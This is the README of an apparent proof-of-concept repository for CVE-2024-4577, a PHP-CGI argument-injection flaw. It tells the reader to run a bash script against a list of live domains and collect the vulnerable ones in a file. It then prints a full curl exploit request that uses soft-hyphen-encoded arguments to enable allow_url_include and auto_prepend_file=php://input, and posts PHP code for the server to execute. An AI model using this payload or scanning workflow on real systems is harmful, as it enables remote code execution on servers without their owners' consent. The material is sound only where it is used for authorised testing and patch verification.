# CVE-2024-4577 Vulnerability Checker
This script is designed to check for the vulnerability described by CVE-2024-4577, which involves exploiting certain PHP configurations to execute arbitrary code remotely. It sends a POST request to specified endpoints on a list of domains and checks if the response indicates vulnerability.
## Usage
1. Install GNU Parallel:
```bash
sudo apt-get install parallel
```
2. **Clone the Repository:**
Clone this repository to your local machine using Git:
```bash
git clone https://github.com/Yukiioz/CVE-2024-4577.git
```
3. **Navigate to the Repository:**
Change into the cloned directory:
```bash
cd CVE-2024-4577
```
4. **Prepare Domain List:**
Create a text file containing a list of domains to check. Each domain should be on a new line. For example:
```
https://example1.com
https://example2.com
https://example3.com
```
5. **Run the Script:**
Execute the script `CVE-2024-4577.sh`, passing the path to the domain list file as an argument:
```bash
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
```
6. **Review Output:**
The script will display progress information as it checks each domain. If a domain is found to be vulnerable, it will be highlighted in red. The script will also export a list of vulnerable domains to a file named `vulnerable_domains.txt`.
#### Exported File: `vulnerable_domains.txt`
The script exports a list of vulnerable domains to a file named `vulnerable_domains.txt`. This file contains a simple list of vulnerable domains, with each domain on a new line. To further manually confirm, use the curl command to send a POST request to the target endpoint on the domain. Replace https://dev.example.com/test.php with the actual endpoint on the target domain.
```bash
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"
```
[4.0K] /data/pocs/8de00d5d6c5ac1d7d870cc988d5cc84e8a6f7726
├── [1.1K] CVE-2024-4577.sh
└── [2.0K] README.md
1 directory, 2 files